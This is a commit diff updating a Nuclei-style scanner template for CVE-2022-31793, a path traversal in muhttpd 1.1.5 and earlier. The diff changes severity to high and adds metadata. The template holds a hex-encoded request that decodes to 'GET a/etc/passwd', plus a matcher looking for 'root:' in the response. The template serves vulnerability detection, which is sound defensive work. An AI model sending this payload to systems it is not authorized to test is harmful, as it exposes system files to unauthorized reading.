Update CVE-2022-31793.yaml
parent
13771bb84d
commit
44ccfbf7b2
|
@ -3,18 +3,21 @@ id: CVE-2022-31793
|
||||||
info:
|
info:
|
||||||
name: muhttpd <= 1.1.5 - Path traversal
|
name: muhttpd <= 1.1.5 - Path traversal
|
||||||
author: scent2d
|
author: scent2d
|
||||||
severity: unknown
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
|
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
|
||||||
reference:
|
reference:
|
||||||
- https://derekabdine.com/blog/2022-arris-advisory.html
|
- https://derekabdine.com/blog/2022-arris-advisory.html
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
|
||||||
tags: cve,cve2022,muhttpd,lfi,unauth
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2022,network,muhttpd,lfi,unauth
|
||||||
|
|
||||||
network:
|
network:
|
||||||
- host:
|
- host:
|
||||||
- "{{Hostname}}"
|
- "{{Hostname}}"
|
||||||
|
|
||||||
inputs:
|
inputs:
|
||||||
- data: "47455420612F6574632F706173737764"
|
- data: "47455420612F6574632F706173737764"
|
||||||
type: hex
|
type: hex
|
||||||
|
@ -23,7 +26,7 @@ network:
|
||||||
read-size: 128
|
read-size: 128
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
encoding: hex
|
encoding: hex
|
||||||
words:
|
words:
|
||||||
- "726f6f743a"
|
- "726f6f743a"
|
||||||
part: body
|
|
||||||
|
|
Loading…
Reference in New Issue